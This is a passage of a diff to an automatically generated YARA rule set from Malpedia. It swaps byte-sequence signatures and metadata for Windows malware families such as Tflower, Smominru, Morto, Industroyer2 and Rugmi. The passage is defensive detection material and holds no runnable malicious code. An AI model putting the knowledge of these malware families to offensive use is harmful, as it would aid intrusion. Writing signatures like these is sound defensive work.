-		$sequence_4 = { ff4dfc 75d1 8bc6 e8???????? 8bf8 8d4701 3dffffff3f }
-		$sequence_5 = { 5e 5b c3 8b4010 80781501 750d }
-		$sequence_6 = { 8b4628 8b4e14 8bfb eb0c 8b5008 3bfa 7302 }
-		$sequence_7 = { 8bd8 8b4310 8b4844 56 3b4840 7205 e8???????? }
-		$sequence_8 = { 0f859af6ffff 8b44240c dd16 c1ef0e 8d84b80400f8ff 6a03 }
-		$sequence_9 = { e9???????? 8b06 834008f0 8b36 b8ffff0000 66014634 8bc7 }
+		$sequence_0 = { 6a01 ff35???????? 6a04 6a01 }
+		$sequence_1 = { 6a04 6a01 50 ff15???????? 85c0 }
+		$sequence_2 = { 6a00 6a00 e8???????? 50 ff15???????? }
+		$sequence_3 = { 85c0 7415 ff15???????? 50 ff15???????? 6aff }
+		$sequence_4 = { ba00ff0000 8bc1 23c2 3bc2 }
+		$sequence_5 = { 69d26d4ec641 81c239300000 2ac2 8801 }
+		$sequence_6 = { e8???????? eb09 a804 7405 e8???????? 803d????????00 }
+		$sequence_7 = { 6a08 68???????? 56 ffd7 85c0 }
+		$sequence_8 = { ff15???????? a3???????? 85c0 74e7 }
+		$sequence_9 = { 7528 68???????? ff15???????? 85c0 7504 33c0 }
+		$sequence_10 = { 59 57 8bf0 ff15???????? 8bc6 }
+		$sequence_11 = { e8???????? 33d2 b9ff3f0000 f7f1 }
+		$sequence_12 = { 8bc6 8703 3bc6 74f8 }
+		$sequence_13 = { 8d429f 3c0f 7705 80ea61 eb0a 8d42bf 3c0f }
+		$sequence_14 = { ff7510 ff750c ff7508 e8???????? 83c40c 8d45fc 50 }
+		$sequence_15 = { c1e910 e9???????? 8ac1 c1e904 c0e004 }
+		$sequence_16 = { 8ac8 240f 80e1f0 80c110 }
+		$sequence_17 = { 3c41 7c11 3c46 7f0d }
+		$sequence_18 = { 03ea 03ff 03db 4883fe1e }
+		$sequence_19 = { 4533c0 488bd6 488bcd 48897c2428 4889442420 ff15???????? }
+		$sequence_20 = { 400f95c7 4533c9 4533c0 ff15???????? }
+		$sequence_21 = { 488364242000 4c8d442430 4533c9 33d2 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 1027072
 }
-rule MALPEDIA_Win_Nikihttp_Auto : FILE
+rule MALPEDIA_Win_Tflower_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7cb3a9d-079b-5853-9e14-59480637c45a"
+		id = "c8b749a8-7605-5cc7-b1f5-9714e975ddf7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nikihttp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nikihttp_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tflower_auto.yar#L1-L157"
 		license_url = "N/A"
-		logic_hash = "3a904456555531ef9c0cf6ba40524ce39305f318798212cc3d8f5ea0c8f6e7e2"
+		logic_hash = "b74bf6ff044f2b1de7c6b08182f1378f15e5cf0c006209455268705fb05e00e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101723,71 +101904,77 @@ rule MALPEDIA_Win_Nikihttp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81fb41cd9ec8 75f0 bbcc8dc70b 662e0f1f840000000000 90 81fbe1bcb5f8 7e28 }
-		$sequence_1 = { bf35a51c0f 41bed886138b 41bf87556a70 0f1f440000 81ffdc69e0ab 0f84b0000000 81ff35a51c0f }
-		$sequence_2 = { 81fe7b887e5d 740a 81fee5f97f04 75f0 eb07 bee5f97f04 ebe7 }
-		$sequence_3 = { b8ca43fd9f e9???????? 488b8d98000000 488b9580000000 488b4580 4883ec20 ffd0 }
-		$sequence_4 = { c785d000000003000000 8b8dd0000000 0fbec9 01c1 bab8c94eab ebab 898dd0000000 }
-		$sequence_5 = { bbdd37ea6d ebb4 884d78 8a4d78 884801 c6400200 488b4d00 }
-		$sequence_6 = { bb26cfb9cb 660f1f840000000000 81fbf6c7d601 7f28 81fbddb48ecd 7f50 81fb1c10669d }
-		$sequence_7 = { 8b442404 8b442404 8b442404 8b442404 8b442404 b837c4eca4 e9???????? }
-		$sequence_8 = { babec982ec 0f45ea ba51cce543 662e0f1f840000000000 0f1f00 81facbe177f9 7e28 }
-		$sequence_9 = { ebe9 89bdd0080000 8b85d0080000 6689431e c785a808000020000000 b813cbdf5e 662e0f1f840000000000 }
+		$sequence_0 = { 0001 0200 0103 0303 }
+		$sequence_1 = { 000f 7708 0001 7708 }
+		$sequence_2 = { 0002 7408 00f7 7308 }
+		$sequence_3 = { 89442414 8b06 83f804 0f8728010000 ff2485249d4a00 6a02 6a01 }
+		$sequence_4 = { 001a 0c05 003c0c 05004e0c05 }
+		$sequence_5 = { 8b148dc0064f00 331485c0024f00 8bc3 c1e808 }
+		$sequence_6 = { 83fa07 8b542410 775e 8b6c2414 ff24ad9ce34600 0fb679ff }
+		$sequence_7 = { 000b 8605???????? 007885 0500788605 }
+		$sequence_8 = { 33148520c54e00 33f2 2bde d3c3 8bc3 }
+		$sequence_9 = { 0010 740b 0021 740b }
+		$sequence_10 = { c745e0787f4b00 e9???????? c745e0647f4b00 e9???????? c745dc02000000 }
+		$sequence_11 = { 0001 7708 00f3 7608 }
+		$sequence_12 = { 0008 7408 0002 7408 }
+		$sequence_13 = { c1e818 8b4d2c c1eb10 03148520c14e00 0fb6c3 8b5d28 }
+		$sequence_14 = { 0fb6c0 8b0c8d20ed4e00 330c8520f14e00 8bc3 c1e818 c1eb10 }
+		$sequence_15 = { 0fbec0 8d89f8feffff 8d0c48 3b0c95788f4f00 }
 
 	condition:
-		7 of them and filesize < 2543616
+		7 of them and filesize < 6578176
 }
-rule MALPEDIA_Win_Unidentified_111_Auto : FILE
+rule MALPEDIA_Win_Plurox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "761c3c1a-627b-5adf-b1c2-f96f11c05a94"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_111_auto.yar#L1-L125"
+		id = "00819bcc-51e2-53a8-9308-9b7887ed6069"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plurox_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "8a86a6eb9509e0a5b4e912cde53abfcabb23f3644fc565d69ca8396c5dc5d7c9"
+		logic_hash = "fa579257df25509063a4df447932e0b25e6ea4c45a2af23b4dfc95998427a19a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4c2428 0fbe09 3bc1 7512 }
-		$sequence_1 = { c744242002000000 e9???????? 837c243406 7511 837c243801 750a }
-		$sequence_2 = { 8b00 488b4c2430 488b09 0fbe0401 48634c2404 488b542428 0fbe0c0a }
-		$sequence_3 = { eb43 41b901000000 448b442424 488b542428 488b4c2448 e8???????? }
-		$sequence_4 = { eb1f c744242000000000 4533c9 4533c0 }
-		$sequence_5 = { 488b4c2448 ff15???????? 89442444 837c244400 7502 eb11 }
-		$sequence_6 = { 488d8c0c60020000 ba02000000 486bd200 4803ca 448bc0 488b542420 e8???????? }
-		$sequence_7 = { 66c1ca08 0fb7d2 4c8b8424a0000000 450fb74006 6641c1c808 450fb7c0 4c8b8c24a0000000 }
-		$sequence_8 = { e8???????? b910000000 e8???????? 4889442448 488b442448 488b4c2450 488908 }
-		$sequence_9 = { 4889542410 48894c2408 4883ec78 c744243000000000 c744243400000000 488b942488000000 488d4c2448 }
+		$sequence_0 = { 0416 128bc606091a f6870f1a000000 e10d 21c9 8918 }
+		$sequence_1 = { 0a20 0816 ec bbf2000000 }
+		$sequence_2 = { 300f 353e0fee3c 031e 2200 }
+		$sequence_3 = { 624a8b 0416 128bc606091a f6870f1a000000 e10d 21c9 }
+		$sequence_4 = { 94 f8 21480e 2a15???????? 6f }
+		$sequence_5 = { 6808486409 58 0000 00e4 0487 58 }
+		$sequence_6 = { 0925???????? 0000 c48dcd713240 89f5 }
+		$sequence_7 = { 0416 128bc606091a f6870f1a000000 e10d }
+		$sequence_8 = { 0442 6808486409 58 0000 }
+		$sequence_9 = { 0d04b8ca08 6af3 dac9 0000 00ee }
 
 	condition:
-		7 of them and filesize < 148480
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE
+rule MALPEDIA_Win_Smominru_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c7e785e-68b0-5d15-8779-d3bc99c37de2"
+		id = "ba1df8df-398d-5a15-b32f-32308ade7ab2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.arik_keylogger_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smominru_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "3dfa4619d5193e3c6023ed0580ae1b26d4332f72fbcfed50985df75f7171bee8"
+		logic_hash = "0db1d77f56494f7e7d1098f916a45decdc9bada94ceb297ac850baf6e6d6e3b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101801,32 +101988,38 @@ rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8???????? e8???????? 83f801 0f85cb000000 8d45b8 e8???????? c745b800000000 }
-		$sequence_1 = { 8d55b0 e8???????? 8b55b0 8d45ac b9???????? e8???????? 8b55ac }
-		$sequence_2 = { e8???????? 8b45f8 80780700 740b 8d55f0 8b45f8 e8???????? }
-		$sequence_3 = { e8???????? 84c0 741d 6a00 6a00 68c6000000 8b45fc }
-		$sequence_4 = { c645f400 8b55fc b8???????? e8???????? 84c0 0f84b3010000 8b45fc }
-		$sequence_5 = { e8???????? 89c1 81f9ff000000 7605 e8???????? 8802 eb08 }
-		$sequence_6 = { e8???????? 88459c 8b45a8 48 83f804 7723 ff248590826100 }
-		$sequence_7 = { e8???????? c745d000000000 8d4dd0 89d8 ba07000000 8b33 ff5678 }
-		$sequence_8 = { 8d45e4 baffffffff e8???????? 8945f8 c645ec00 8d4dd8 8d55c0 }
-		$sequence_9 = { b8???????? e8???????? 84c0 741b 8b45fc 8b80a8020000 8b55f4 }
+		$sequence_0 = { 894634 8b4718 894638 8b471c 89463c 8b4720 894640 }
+		$sequence_1 = { 8b5604 0fa5d0 8907 83c604 }
+		$sequence_2 = { 8b55fc ff5704 837b0c08 7549 }
+		$sequence_3 = { 8d6c2400 6aff 68b0f3e877 ff7508 }
+		$sequence_4 = { c9 c20c00 57 5f 55 54 }
+		$sequence_5 = { 8b55fc f76a14 c1e002 50 8b45fc }
+		$sequence_6 = { 8b5604 81e2ffffff7f 03c2 8bd0 }
+		$sequence_7 = { 8b5604 81ca00000002 33c9 8a8b15020000 }
+		$sequence_8 = { e8???????? 33c0 894704 894708 89470c 894710 894714 }
+		$sequence_9 = { ff15???????? 85c0 0f8c5f37ac7b 33c0 40 }
+		$sequence_10 = { 8b5604 59 e8???????? 85c0 }
+		$sequence_11 = { 8b5604 3bfa 7372 8b1e }
+		$sequence_12 = { 8b55fc ff560c 8b450c ff00 }
+		$sequence_13 = { 8bc6 5e c9 c20800 8d7f00 55 }
+		$sequence_14 = { 5f 55 8d6c2400 8b450c }
+		$sequence_15 = { 8975e0 8975dc 8975c0 8975c8 39750c 0f841948ab7b }
 
 	condition:
-		7 of them and filesize < 4947968
+		7 of them and filesize < 8167424
 }
-rule MALPEDIA_Win_Asprox_Auto : FILE
+rule MALPEDIA_Win_Chinotto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "760d5ba5-eb2e-56fe-8b68-64c041182dd0"
+		id = "35bb4fea-9679-5e3a-b2bd-3a05c48c1c83"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.asprox_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chinotto_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "0433055da9e2395dd1bdc28ed8f399d8aecafba94a64506b61f0a5f3795ff961"
+		logic_hash = "4531bba6bf5c08578cccf53130069c66edf41ca25754f112d734535821ebc612"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101840,71 +102033,71 @@ rule MALPEDIA_Win_Asprox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8955d4 eb05 e9???????? 8b45d4 898538ffffff c6459447 }
-		$sequence_1 = { e9???????? 8b03 83780400 0f84fe070000 8b10 0fb612 8b4b1c }
-		$sequence_2 = { 038cfe94c90000 0394fe98c90000 668945d0 c1e810 66894dd4 c1e910 668955d8 }
-		$sequence_3 = { c645f300 6800100000 6a00 a1???????? 50 ff15???????? 8945f8 }
-		$sequence_4 = { 49 7407 33c0 e9???????? 3bd3 0f858d000000 8b4e0c }
-		$sequence_5 = { e8???????? 83c414 8b55e8 8955f0 c745e400000000 6a10 8d45e4 }
-		$sequence_6 = { 895e04 40 eb20 8bc3 eb1c e8???????? }
-		$sequence_7 = { 52 8b45fc 50 ff15???????? 83c408 68???????? 8b4dfc }
-		$sequence_8 = { 51 8b952cffffff 52 ff15???????? 898558ffffff 8b8560ffffff 898570ffffff }
-		$sequence_9 = { 6a00 8b55e4 52 ff15???????? 8a45fb 8be5 }
+		$sequence_0 = { 8b4df0 897df4 895de4 8955f8 85c9 0f853dffffff e9???????? }
+		$sequence_1 = { 57 33f6 bf???????? 833cf5a4e6410001 751d 8d04f5a0e64100 8938 }
+		$sequence_2 = { 8985a8f6ffff 8d95b4f6ffff 52 8d85c4f6ffff 50 c785a0f6ffff0c000000 }
+		$sequence_3 = { c3 8b4d08 8b5648 8b45f4 c74638c0444000 897644 897a3c }
+		$sequence_4 = { 5d c3 8b4de0 8b55d8 8b45ec c1e106 034ddc }
+		$sequence_5 = { 8bd0 8955d8 eb03 8955d8 }
+		$sequence_6 = { 50 ff15???????? 8b853cf7ffff 03c3 50 e8???????? 8b8d38f7ffff }
+		$sequence_7 = { b969000000 66894de2 b96f000000 66894de4 b96e000000 66894de6 b93d000000 }
+		$sequence_8 = { 8b5628 6a58 6a01 51 }
+		$sequence_9 = { 6683f919 7725 8d4805 83f97a 7e08 83c0eb 0fb7c0 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 300032
 }
-rule MALPEDIA_Win_Moure_Auto : FILE
+rule MALPEDIA_Win_Unidentified_073_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "24a69d15-3d57-5717-b947-e4f8b8b4c7de"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moure_auto.yar#L1-L125"
+		id = "0ba61f73-e46a-5f54-853f-f1f3b502ee26"
+		date = "2022-08-05"
+		modified = "2022-08-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_073_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a44a23c1ab1d27db26aa7a8c25dca384907550ea332fbf4f4e348b0d15134c0b"
+		logic_hash = "8100472ca712d569bbcdb570af72e3f13986092b4d8ee8e3873da55bef76232d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20220805"
+		malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71"
+		malpedia_version = "20220808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3454 43 1558c950cb 0d487b0d4c 36a373801f1e }
-		$sequence_1 = { bf55602540 006b05 bc7d506700 0033 58 bf35b8bf55 58 }
-		$sequence_2 = { 8b35???????? 57 00d6 0075f0 894508 0075fc 00d6 }
-		$sequence_3 = { 51 51 8b0d???????? 56 33f6 85c9 7509 }
-		$sequence_4 = { 837dbc00 7436 0075bc 8d4ddc e8???????? a1???????? 3bc6 }
-		$sequence_5 = { 47 8705???????? 00bf35b8bf55 a4 254000c935 b8cdc58cbb }
-		$sequence_6 = { 3345fc 83c40c 23c7 3106 f70600000020 }
-		$sequence_7 = { 5e 53 43 c1c361 5b c9 51 }
-		$sequence_8 = { 668945e0 68a3714000 8bf0 85f6 7c2b 8b7d14 }
-		$sequence_9 = { be844e0001 56 6a1f 007014 }
+		$sequence_0 = { 8d8538ffffff 6a00 c746180f000000 8bce }
+		$sequence_1 = { c684242801000019 e8???????? 68???????? 8d8c24c0000000 e8???????? 6aff }
+		$sequence_2 = { 8bce c7461400000000 50 c6460400 e8???????? 83ec1c 8bf4 }
+		$sequence_3 = { 7846 8b451c 8b0e 2bc1 3bc3 7c53 }
+		$sequence_4 = { 8b0d???????? 894df8 eb09 8b55f8 83ea01 8955f8 837df800 }
+		$sequence_5 = { 6a00 8d8424dc000000 50 8d4c2454 e8???????? 83ec1c 8d84240c010000 }
+		$sequence_6 = { 8bec 51 894dfc c705????????90664a00 833d????????00 741c }
+		$sequence_7 = { 6bd103 8982a0784a00 68???????? 8b45fc 50 ff15???????? }
+		$sequence_8 = { 0fb74df8 894de0 668b55e0 668955f8 0fb745fc 0fb74df8 3bc1 }
+		$sequence_9 = { 57 6aff 68???????? 50 ff15???????? }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1974272
 }
-rule MALPEDIA_Win_Akira_Auto : FILE
+rule MALPEDIA_Win_Morto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9957fbe0-0809-5ea9-92e6-35285e3e151d"
+		id = "8b5b99ce-9055-5caf-9153-d6b5f44f1d51"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.akira_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.morto_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "3bec6caf716d6a1efb83aa954ea803db62de6e65cc0a5401d25e2d0c788df4d4"
+		logic_hash = "3f690f88537e995c1dc2e4101db7568f5b1a20d460c6735cbb429d69f53136bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101918,32 +102111,32 @@ rule MALPEDIA_Win_Akira_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb64718 8807 4863c1 48893cc2 e9???????? 0fb64718 8807 }
-		$sequence_1 = { 498d4f18 e8???????? 84c0 742d 498d5718 488d8f18030000 }
-		$sequence_2 = { 6642833c4000 75f5 488d559d 488d8de0080000 e8???????? 90 c645a700 }
-		$sequence_3 = { e9???????? 488d8a20140000 e9???????? 488d8a40140000 e9???????? }
-		$sequence_4 = { ffc3 48ffc0 4883f806 7cee 488bcf e8???????? 488b5c2450 }
-		$sequence_5 = { 4883c108 488b01 48c70100000000 4889442460 bb04000000 4885f6 744e }
-		$sequence_6 = { 0f8456ffffff eb05 4084f6 7407 41c60630 49ffc6 498bd4 }
-		$sequence_7 = { 488bda 4533ed 41f7411800400000 7528 410f1000 0f2945c0 4c8b11 }
-		$sequence_8 = { f00fc181a4000000 83f801 7506 e8???????? 90 488bc3 4883c420 }
-		$sequence_9 = { 48895110 4c8bc7 418bd6 e8???????? 4088341f e9???????? 488bc7 }
+		$sequence_0 = { 50 e8???????? 59 8d8594fdffff 59 56 50 }
+		$sequence_1 = { 8bf9 760c 8a4d10 280c30 40 3b450c }
+		$sequence_2 = { 0f859f020000 53 57 8ac0 33db ba25537973 }
+		$sequence_3 = { ff55ec 53 6a04 ff55e4 6a01 }
+		$sequence_4 = { 6a01 68???????? ff35???????? a3???????? e8???????? 83c438 }
+		$sequence_5 = { 3bc3 59 0f843e010000 8d4dbc 51 50 }
+		$sequence_6 = { c20c00 b8???????? e8???????? 81ec38020000 53 56 57 }
+		$sequence_7 = { 50 6a00 ff15???????? 85c0 894704 742a 83c005 }
+		$sequence_8 = { b9???????? e9???????? 55 8bec b86c260300 }
+		$sequence_9 = { 8b450c 68???????? c745f44d61696e c745f854687265 ff30 c745fc61640000 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1286144
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Eyservice_Auto : FILE
+rule MALPEDIA_Win_Industroyer2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01143abf-4326-5001-b471-74ce2f23b942"
+		id = "5e868bea-ed7e-5974-96ba-660ba0f6c883"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eyservice_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.industroyer2_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "cec2c9ebe5b9e4768a39fd8dee155ccbac651c379b500243ead7740363768937"
+		logic_hash = "af4403ef973a2e44095a1be12f63d921343b5d2fe519fbae198aa69e0c4340cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101957,32 +102150,32 @@ rule MALPEDIA_Win_Eyservice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d4c2408 8bf0 c7842460080000ffffffff e8???????? }
-		$sequence_1 = { 0f85e5000000 c70600000000 c70702000000 e9???????? 83f85a 0f85cb000000 }
-		$sequence_2 = { 83bef800000000 747c 8d4c2408 e8???????? a1???????? 8d4c2408 51 }
-		$sequence_3 = { 50 b9???????? c7442454ffffffff e8???????? 46 3bf7 }
-		$sequence_4 = { 56 8bc8 e8???????? eb02 33c0 89442410 8d442410 }
-		$sequence_5 = { 5f 5e 59 c21000 53 8bfb 53 }
-		$sequence_6 = { 83c404 894de8 c645fc01 3bce 7417 e8???????? 8b4df4 }
-		$sequence_7 = { ffd3 8d442434 68???????? 50 ff15???????? 68???????? 8d8c2444010000 }
-		$sequence_8 = { 888654720000 66099652720000 3c08 76bc 0fb78652720000 808654720000f8 0fb7c8 }
-		$sequence_9 = { 894e0c 8b5010 895610 8b4814 894e14 8b5018 895618 }
+		$sequence_0 = { 8b4dfc 8b11 c6420603 8b45fc 8b08 c6410783 8b55fc }
+		$sequence_1 = { ebcc 8b4508 8b8848010100 8b55f4 }
+		$sequence_2 = { 894a0c 8b55f8 8b02 8b4d20 8b5108 895008 8b45f8 }
+		$sequence_3 = { 8b4508 8945fc 8b4d0c 894df8 837d0800 7414 }
+		$sequence_4 = { e8???????? 83c404 85c0 7636 68???????? 8b4508 }
+		$sequence_5 = { 52 e8???????? 8b4508 83780800 }
+		$sequence_6 = { 694d18a0860100 034d1c 8b55fc 894a14 8b45fc 8be5 }
+		$sequence_7 = { 50 e8???????? 8b4dec 894110 8b55fc 83c201 8955fc }
+		$sequence_8 = { a1???????? 8945e0 8b0d???????? 894de4 8a15???????? 8855e8 8d45d8 }
+		$sequence_9 = { e9???????? 68???????? e8???????? 50 e8???????? 83c408 6a08 }
 
 	condition:
-		7 of them and filesize < 452608
+		7 of them and filesize < 100352
 }
-rule MALPEDIA_Win_Heyoka_Auto : FILE
+rule MALPEDIA_Win_Rugmi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "374fa72e-9fa9-57de-876f-40244ff261b7"
+		id = "56dfd636-865d-5e6b-99e2-82ed18d11802"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heyoka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.heyoka_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rugmi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rugmi_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "3a5efb9930b3bae06b8a8e2c4e2b028b7e1db66cce7d680b56a42e4a7b874053"
+		logic_hash = "6414237b4a37eccf99db6de8d88a3ab9402e6945fd1a3f91716e86d56c16f3fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101996,32 +102189,32 @@ rule MALPEDIA_Win_Heyoka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? ff15???????? b801000000 5d c3 55 8bec }
-		$sequence_1 = { 8b5118 895018 a1???????? 8b4dfc 894818 8b55fc 8915???????? }
-		$sequence_2 = { 0345f8 8a4df1 8848ff 8b55f8 3b550c 7c02 eb02 }
-		$sequence_3 = { 8bec 8b4508 33c9 8a480c 51 8b5508 83c20d }
-		$sequence_4 = { 8b45ec 8945f4 8b4df7 81e1ff000000 51 8b55f6 81e2ff000000 }
-		$sequence_5 = { 8b0d???????? 894df8 683f420f00 6a00 8b15???????? 52 e8???????? }
-		$sequence_6 = { 8bec 81ec18040000 57 c685f0fbffff00 b9ff000000 33c0 8dbdf1fbffff }
-		$sequence_7 = { 8bc3 885d0b c1e808 88450a 0fb6c0 f68061d7011004 }
-		$sequence_8 = { 8b7508 8b06 8945c0 3bc3 7545 8d45c0 50 }
-		$sequence_9 = { 8b5590 83c201 895590 8b4590 3b4510 0f87ab000000 8b4d0c }
+		$sequence_0 = { 33db 395d08 0f94c3 8b4518 8b4d08 8908 8bc3 }
+		$sequence_1 = { 8b7704 eb14 85c0 0f8535010000 56 57 e8???????? }
+		$sequence_2 = { 3bcb 726f 8b7514 8b5d10 8bc1 0bc2 7508 }
+		$sequence_3 = { 7507 b8074c0000 c9 c3 8d45e0 50 68???????? }
+		$sequence_4 = { 894d08 8d56bc 0f45fa 68???????? 03f9 e8???????? 8b7510 }
+		$sequence_5 = { 5d c3 837d08ff 0f84b4090000 e9???????? 55 8bec }
+		$sequence_6 = { 395e3c 7520 85ff 0f841c010000 6a0a 68???????? }
+		$sequence_7 = { 88834d020000 8b84b350010000 83f8ff 7413 50 53 57 }
+		$sequence_8 = { 8955e4 c645fc00 8d4dcc e8???????? c745fcffffffff 8d8d70ffffff }
+		$sequence_9 = { 56 c687cf0c000000 68???????? e9???????? 6a02 59 6a17 }
 
 	condition:
-		7 of them and filesize < 270336
+		7 of them and filesize < 950272
 }
-rule MALPEDIA_Win_Deathransom_Auto : FILE
+rule MALPEDIA_Win_Supper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
